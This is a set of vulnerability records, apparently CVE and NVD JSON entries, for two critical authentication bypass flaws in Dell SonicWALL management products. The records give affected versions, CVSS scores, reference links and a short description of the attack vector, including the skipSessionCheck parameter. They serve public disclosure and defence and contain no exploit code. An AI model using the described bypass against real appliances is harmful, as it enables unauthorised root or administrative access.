http://archives.neohapsis.com/archives/bugtraq/2013-01/0075.html | x_refsource_MISC | |
https://packetstormsecurity.com/files/cve/CVE-2013-1360 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T14:57:05.126Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.securitytracker.com/id/1028007" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.securityfocus.com/bid/57446" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81366" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.exploit-db.com/exploits/24203" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://archives.neohapsis.com/archives/bugtraq/2013-01/0075.html" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://packetstormsecurity.com/files/cve/CVE-2013-1360" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2013-01-17T00:00:00", "descriptions": [ { "lang": "en", "value": "An Authentication Bypass vulnerability exists in DELL SonicWALL Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0, Analyzer 7.0, Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, and 6.0 via a crafted request to the SGMS interface, which could let a remote malicious user obtain administrative access." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-02-11T15:44:43", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "http://www.securitytracker.com/id/1028007" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.securityfocus.com/bid/57446" }, { "tags": [ "x_refsource_MISC" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81366" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.exploit-db.com/exploits/24203" }, { "tags": [ "x_refsource_MISC" ], "url": "http://archives.neohapsis.com/archives/bugtraq/2013-01/0075.html" }, { "tags": [ "x_refsource_MISC" ], "url": "https://packetstormsecurity.com/files/cve/CVE-2013-1360" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2013-1360", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An Authentication Bypass vulnerability exists in DELL SonicWALL Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0, Analyzer 7.0, Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, and 6.0 via a crafted request to the SGMS interface, which could let a remote malicious user obtain administrative access." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "http://www.securitytracker.com/id/1028007", "refsource": "MISC", "url": "http://www.securitytracker.com/id/1028007" }, { "name": "http://www.securityfocus.com/bid/57446", "refsource": "MISC", "url": "http://www.securityfocus.com/bid/57446" }, { "name": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81366", "refsource": "MISC", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81366" }, { "name": "http://www.exploit-db.com/exploits/24203", "refsource": "MISC", "url": "http://www.exploit-db.com/exploits/24203" }, { "name": "http://archives.neohapsis.com/archives/bugtraq/2013-01/0075.html", "refsource": "MISC", "url": "http://archives.neohapsis.com/archives/bugtraq/2013-01/0075.html" }, { "name": "https://packetstormsecurity.com/files/cve/CVE-2013-1360", "refsource": "MISC", "url": "https://packetstormsecurity.com/files/cve/CVE-2013-1360" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2013-1360", "datePublished": "2020-02-11T15:44:43", "dateReserved": "2013-01-14T00:00:00", "dateUpdated": "2024-08-06T14:57:05.126Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2013-1359
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securityfocus.com/bid/57445 | x_refsource_MISC | |
http://www.exploit-db.com/exploits/24204 | x_refsource_MISC | |
http://www.exploit-db.com/exploits/24322 | x_refsource_MISC | |
http://www.securitytracker.com/id/1028007 | x_refsource_MISC | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/81367 | x_refsource_MISC | |
https://packetstormsecurity.com/files/author/7547/ | x_refsource_MISC | |
https://fortiguard.com/encyclopedia/ips/35264/multiple-sonicwall-products-authentication-bypass-vulns | x_refsource_MISC | |
https://seclists.org/fulldisclosure/2013/Jan/125 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T14:57:05.116Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.securityfocus.com/bid/57445" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.exploit-db.com/exploits/24204" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.exploit-db.com/exploits/24322" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.securitytracker.com/id/1028007" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81367" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://packetstormsecurity.com/files/author/7547/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://fortiguard.com/encyclopedia/ips/35264/multiple-sonicwall-products-authentication-bypass-vulns" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://seclists.org/fulldisclosure/2013/Jan/125" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2013-01-17T00:00:00", "descriptions": [ { "lang": "en", "value": "An Authentication Bypass Vulnerability exists in DELL SonicWALL Analyzer 7.0, Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0; Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, 5.1, and 6.0 via the skipSessionCheck parameter to the UMA interface (/appliance/), which could let a remote malicious user obtain access to the root account." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-02-11T16:42:01", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "http://www.securityfocus.com/bid/57445" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.exploit-db.com/exploits/24204" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.exploit-db.com/exploits/24322" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.securitytracker.com/id/1028007" }, { "tags": [ "x_refsource_MISC" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81367" }, { "tags": [ "x_refsource_MISC" ], "url": "https://packetstormsecurity.com/files/author/7547/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://fortiguard.com/encyclopedia/ips/35264/multiple-sonicwall-products-authentication-bypass-vulns" }, { "tags": [ "x_refsource_MISC" ], "url": "https://seclists.org/fulldisclosure/2013/Jan/125" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2013-1359", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An Authentication Bypass Vulnerability exists in DELL SonicWALL Analyzer 7.0, Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0; Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, 5.1, and 6.0 via the skipSessionCheck parameter to the UMA interface (/appliance/), which could let a remote malicious user obtain access to the root account." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "http://www.securityfocus.com/bid/57445", "refsource": "MISC", "url": "http://www.securityfocus.com/bid/57445" }, { "name": "http://www.exploit-db.com/exploits/24204", "refsource": "MISC", "url": "http://www.exploit-db.com/exploits/24204" }, { "name": "http://www.exploit-db.com/exploits/24322", "refsource": "MISC", "url": "http://www.exploit-db.com/exploits/24322" }, { "name": "http://www.securitytracker.com/id/1028007", "refsource": "MISC", "url": "http://www.securitytracker.com/id/1028007" }, { "name": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81367", "refsource": "MISC", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81367" }, { "name": "https://packetstormsecurity.com/files/author/7547/", "refsource": "MISC", "url": "https://packetstormsecurity.com/files/author/7547/" }, { "name": "https://fortiguard.com/encyclopedia/ips/35264/multiple-sonicwall-products-authentication-bypass-vulns", "refsource": "MISC", "url": "https://fortiguard.com/encyclopedia/ips/35264/multiple-sonicwall-products-authentication-bypass-vulns" }, { "name": "https://seclists.org/fulldisclosure/2013/Jan/125", "refsource": "MISC", "url": "https://seclists.org/fulldisclosure/2013/Jan/125" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2013-1359", "datePublished": "2020-02-11T16:42:01", "dateReserved": "2013-01-14T00:00:00", "dateUpdated": "2024-08-06T14:57:05.116Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
Vulnerability from fkie_nvd
Vendor | Product | Version | |
---|---|---|---|
sonicwall | analyzer | 7.0 | |
sonicwall | global_management_system | 4.1 | |
sonicwall | global_management_system | 5.0 | |
sonicwall | global_management_system | 5.1 | |
sonicwall | global_management_system | 6.0 | |
sonicwall | global_management_system | 7.0 | |
sonicwall | universal_management_appliance | 5.1 | |
sonicwall | universal_management_appliance | 6.0 | |
sonicwall | universal_management_appliance | 7.0 | |
sonicwall | viewpoint | 4.1 | |
sonicwall | viewpoint | 5.0 | |
sonicwall | viewpoint | 6.0 |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sonicwall:analyzer:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "7A9ABA5C-59AF-496A-B22E-0C88892EC8FD", "vulnerable": true }, { "criteria": "cpe:2.3:a:sonicwall:global_management_system:4.1:*:*:*:*:*:*:*", "matchCriteriaId": "3627733D-E0CD-4E00-8D36-AB4EF784977C", "vulnerable": true }, { "criteria": "cpe:2.3:a:sonicwall:global_management_system:5.0:*:*:*:*:*:*:*", "matchCriteriaId": "60563570-4865-4D8B-9E24-A371CABE1BFE", "vulnerable": true }, { "criteria": "cpe:2.3:a:sonicwall:global_management_system:5.1:*:*:*:*:*:*:*", "matchCriteriaId": "B2EFEF89-357C-4EC2-B6A3-C803E64A2227", "vulnerable": true }, { "criteria": "cpe:2.3:a:sonicwall:global_management_system:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "CE35F845-3A01-4974-BD7C-88CBE759830D", "vulnerable": true }, { "criteria": "cpe:2.3:a:sonicwall:global_management_system:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "CEF95BB8-DF0B-4131-8A89-82DE559CC09B", "vulnerable": true }, { "criteria": "cpe:2.3:a:sonicwall:universal_management_appliance:5.1:*:*:*:*:*:*:*", "matchCriteriaId": "0AC115CB-0F22-47C8-86F3-9990058896FA", "vulnerable": true }, { "criteria": "cpe:2.3:a:sonicwall:universal_management_appliance:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "160BD653-09A8-4939-9A5D-8EED7B5B4D78", "vulnerable": true }, { "criteria": "cpe:2.3:a:sonicwall:universal_management_appliance:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "747153CA-2225-40A3-9C21-E9E62C24892B", "vulnerable": true }, { "criteria": "cpe:2.3:a:sonicwall:viewpoint:4.1:*:*:*:*:*:*:*", "matchCriteriaId": "FE97B72B-31B2-4E2D-99EE-81A1C645CDF4", "vulnerable": true }, { "criteria": "cpe:2.3:a:sonicwall:viewpoint:5.0:*:*:*:*:*:*:*", "matchCriteriaId": "28C845AC-8B12-4147-A5D7-9D5E4C7953EB", "vulnerable": true }, { "criteria": "cpe:2.3:a:sonicwall:viewpoint:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "1589B409-1AF8-4789-90C3-6E1DFA14677E", "vulnerable": true } ], "negate": false, "operator": "OR" } ] } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "An Authentication Bypass Vulnerability exists in DELL SonicWALL Analyzer 7.0, Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0; Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, 5.1, and 6.0 via the skipSessionCheck parameter to the UMA interface (/appliance/), which could let a remote malicious user obtain access to the root account." }, { "lang": "es", "value": "Se presenta una Vulnerabilidad de Omisi\u00f3n de Autenticaci\u00f3n en DELL SonicWALL Analyzer versi\u00f3n 7.0, Global Management System (GMS) versiones 4.1, 5.0, 5.1, 6.0 y 7.0; Universal Management Appliance (UMA) versiones 5.1, 6.0 y 7.0 y ViewPoint versiones 4.1, 5.0, 5.1 y 6.0 por medio del par\u00e1metro skipSessionCheck en la interfaz UMA (/appliance/), lo que podr\u00eda permitir a un usuario malicioso remoto obtener acceso a la cuenta root." } ], "id": "CVE-2013-1359", "lastModified": "2024-11-21T01:49:25.517", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2020-02-11T17:15:11.593", "references": [ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://www.exploit-db.com/exploits/24204" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://www.exploit-db.com/exploits/24322" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/57445" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securitytracker.com/id/1028007" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81367" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://fortiguard.com/encyclopedia/ips/35264/multiple-sonicwall-products-authentication-bypass-vulns" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "https://packetstormsecurity.com/files/author/7547/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Mailing List", "Third Party Advisory" ], "url": "https://seclists.org/fulldisclosure/2013/Jan/125" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://www.exploit-db.com/exploits/24204" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://www.exploit-db.com/exploits/24322" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/57445" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securitytracker.com/id/1028007" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81367" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://fortiguard.com/encyclopedia/ips/35264/multiple-sonicwall-products-authentication-bypass-vulns" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "https://packetstormsecurity.com/files/author/7547/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Mailing List", "Third Party Advisory" ], "url": "https://seclists.org/fulldisclosure/2013/Jan/125" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-287" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
Vendor | Product | Version | |
---|---|---|---|
sonicwall | analyzer | 7.0 | |
sonicwall | global_management_system | 4.1 | |
sonicwall | global_management_system | 5.0 | |
sonicwall | global_management_system | 5.1 | |
sonicwall | global_management_system | 6.0 | |
sonicwall | global_management_system | 7.0 | |
sonicwall | universal_management_appliance | 5.1 | |
sonicwall | universal_management_appliance | 6.0 | |
sonicwall | universal_management_appliance | 7.0 | |
sonicwall | viewpoint | 4.1 | |
sonicwall | viewpoint | 5.0 | |
sonicwall | viewpoint | 6.0 |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sonicwall:analyzer:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "7A9ABA5C-59AF-496A-B22E-0C88892EC8FD", "vulnerable": true }, { "criteria": "cpe:2.3:a:sonicwall:global_management_system:4.1:*:*:*:*:*:*:*", "matchCriteriaId": "3627733D-E0CD-4E00-8D36-AB4EF784977C", "vulnerable": true }, { "criteria": "cpe:2.3:a:sonicwall:global_management_system:5.0:*:*:*:*:*:*:*", "matchCriteriaId": "60563570-4865-4D8B-9E24-A371CABE1BFE", "vulnerable": true }, { "criteria": "cpe:2.3:a:sonicwall:global_management_system:5.1:*:*:*:*:*:*:*", "matchCriteriaId": "B2EFEF89-357C-4EC2-B6A3-C803E64A2227", "vulnerable": true }, { "criteria": "cpe:2.3:a:sonicwall:global_management_system:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "CE35F845-3A01-4974-BD7C-88CBE759830D", "vulnerable": true }, { "criteria": "cpe:2.3:a:sonicwall:global_management_system:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "CEF95BB8-DF0B-4131-8A89-82DE559CC09B", "vulnerable": true }, { "criteria": "cpe:2.3:a:sonicwall:universal_management_appliance:5.1:*:*:*:*:*:*:*", "matchCriteriaId": "0AC115CB-0F22-47C8-86F3-9990058896FA", "vulnerable": true }, { "criteria": "cpe:2.3:a:sonicwall:universal_management_appliance:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "160BD653-09A8-4939-9A5D-8EED7B5B4D78", "vulnerable": true }, { "criteria": "cpe:2.3:a:sonicwall:universal_management_appliance:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "747153CA-2225-40A3-9C21-E9E62C24892B", "vulnerable": true }, { "criteria": "cpe:2.3:a:sonicwall:viewpoint:4.1:*:*:*:*:*:*:*", "matchCriteriaId": "FE97B72B-31B2-4E2D-99EE-81A1C645CDF4", "vulnerable": true }, { "criteria": "cpe:2.3:a:sonicwall:viewpoint:5.0:*:*:*:*:*:*:*", "matchCriteriaId": "28C845AC-8B12-4147-A5D7-9D5E4C7953EB", "vulnerable": true }, { "criteria": "cpe:2.3:a:sonicwall:viewpoint:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "1589B409-1AF8-4789-90C3-6E1DFA14677E", "vulnerable": true } ], "negate": false, "operator": "OR" } ] } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "An Authentication Bypass vulnerability exists in DELL SonicWALL Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0, Analyzer 7.0, Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, and 6.0 via a crafted request to the SGMS interface, which could let a remote malicious user obtain administrative access." }, { "lang": "es", "value": "Se presenta una vulnerabilidad de Omisi\u00f3n de Autenticaci\u00f3n en DELL SonicWALL Global Management System (GMS) versiones 4.1, 5.0, 5.1, 6.0 y 7.0, Analyzer versi\u00f3n 7.0, Universal Management Appliance (UMA) versiones 5.1, 6.0 y 7.0 y ViewPoint versiones 4.1, 5.0 y 6.0, por medio de una petici\u00f3n dise\u00f1ada en la interfaz SGMS, que podr\u00eda permitir a un usuario malicioso remoto obtener acceso administrativo." } ], "id": "CVE-2013-1360", "lastModified": "2024-11-21T01:49:25.667", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2020-02-11T16:15:12.227", "references": [ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://archives.neohapsis.com/archives/bugtraq/2013-01/0075.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://www.exploit-db.com/exploits/24203" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/57446" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securitytracker.com/id/1028007" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81366" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://packetstormsecurity.com/files/cve/CVE-2013-1360" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "http://archives.neohapsis.com/archives/bugtraq/2013-01/0075.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://www.exploit-db.com/exploits/24203" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/57446" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securitytracker.com/id/1028007" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81366" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://packetstormsecurity.com/files/cve/CVE-2013-1360" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-287" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }